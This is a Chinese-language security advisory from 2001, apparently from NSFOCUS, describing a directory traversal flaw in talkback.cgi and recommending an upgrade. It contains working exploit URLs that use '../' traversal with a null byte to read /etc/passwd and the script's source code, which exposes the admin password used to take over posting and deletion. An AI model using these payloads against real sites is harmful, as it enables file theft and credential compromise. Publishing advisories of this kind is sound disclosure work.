首页 -> 安全研究

安全研究

安全漏洞
talkback.cgi 遍历目录漏洞

发布日期:2001-04-11
更新日期:2001-04-11

受影响系统:

talkback.cgi

描述:

Talkback.cgi 允许远程用户(WEB页面访问者)以WEB服务器所拥有的权限访问WEB服务
器上任意文件。远程用户提交如下URL:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
.../../../../../../../../etc/passwd%00&action=view&matchview=1

将显示出/etc/passwd文件内容。

如果提交这样一个URL:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
.../cgi-bin/talkback.cgi%00&action=view&matchview=1

将显示talkback.cgi自身的原代码,其中包含管理口令$admin_password。上面假设
talkback.cgi位于cgi-bin下,实际测试的时候可能需要修改。当你获取了管理口令
之后,提交如下URL:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

就可以贴文章、删文章了。

参看 http://www.waytotheweb.com

<* 来源:Stan a.k.a. ThePike (stan@whizkunde.org) *>



建议:

    访问如下链接获取talkback.cgi升级版本
    http://www.waytotheweb.com/webscripts/talkback.htm



浏览次数:3743
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障